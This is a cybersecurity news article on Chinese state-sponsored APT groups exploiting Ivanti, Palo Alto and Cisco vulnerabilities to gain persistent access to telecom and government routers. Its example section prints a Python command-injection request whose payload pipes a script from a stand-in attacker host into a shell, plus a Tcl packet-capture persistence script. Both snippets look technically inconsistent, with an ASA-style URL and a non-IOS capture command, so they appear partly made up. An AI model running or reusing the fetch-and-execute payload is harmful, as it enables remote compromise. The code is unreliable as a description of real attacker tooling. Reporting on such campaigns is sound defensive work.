Chinese APT Hackers Exploit Router Vulnerabilities to Infiltrate Enterprise Environments

Cybersecurity

Recent analyses have uncovered a systematic campaign by Chinese state-sponsored Advanced Persistent Threat (APT) groups targeting vulnerabilities in enterprise-grade routers. These activities have established persistent access within global telecommunications and government networks.

Targeted Vulnerabilities

The APT groups, identified by names such as Salt Typhoon and OPERATOR PANDA, focus on provider edge (PE) and customer edge (CE) devices. They exploit publicly disclosed Common Vulnerabilities and Exposures (CVEs) to gain unauthorized access. Notably, CVE-2024-21887 in Ivanti Connect Secure and CVE-2024-3400 in Palo Alto Networks PAN-OS GlobalProtect are commonly targeted.

Exploitation Techniques

These threat actors employ multi-stage attack flows, often beginning with web-component injection, leading to embedded packet capture. The hacking process includes remote code execution through crafted HTTP requests, enabling access to router management interfaces.

Post-initial access, the attackers target older vulnerabilities such as CVE-2018-0171 in Cisco IOS smart install and CVE-2023-20198 in IOS XE web management modules. This creates a robust escalation path for persistent access.

Technical Implementation

Cyble analysts have observed the rapid adaptation of public exploit codes, often customized in Python or Tcl scripts for specific environments. An example of command injection via web management interfaces is as follows:

import requests

url = "https://192.0.2.1/+CSCOE+/translation-table?type=misc&text_scale=1"
payload = {"command": "system ('curl http://attacker.com/shell.sh | sh')"}
response = requests.post(url, data=payload, verify=False)
print(response.status_code, response.text)

This method allows remote shell execution, facilitating the deployment of custom tools to extract configuration files, credentials, and session data.

Persistence Tactics

Upon gaining initial access, these groups focus on maintaining long-term presence by modifying Access Control Lists (ACLs) to whitelist attacker IPs and opening non-standard ports for covert access. They leverage Cisco’s Embedded Packet Capture (EPC) functionality to intercept authentication traffic, extracting clear-text credentials.

Scripts, often Tcl-based, are stored in the router’s flash memory to automate these activities. An example script is:

package require json
set capCmd [list "ip" "packet" "capture" "point-to-point" "rtl" "1000"]
exec {*}$capCmd > flash:auth_capture.pcap

These scripts are executed at boot, creating persistent capture files that are periodically exfiltrated via encrypted GRE tunnels. By altering AAA (Authentication, Authorization, Accounting) configurations, the attackers obfuscate their presence by redirecting logs and disabling alerting mechanisms.

This sophisticated approach allows APT groups to sustain a hidden presence in compromised networks for extended periods.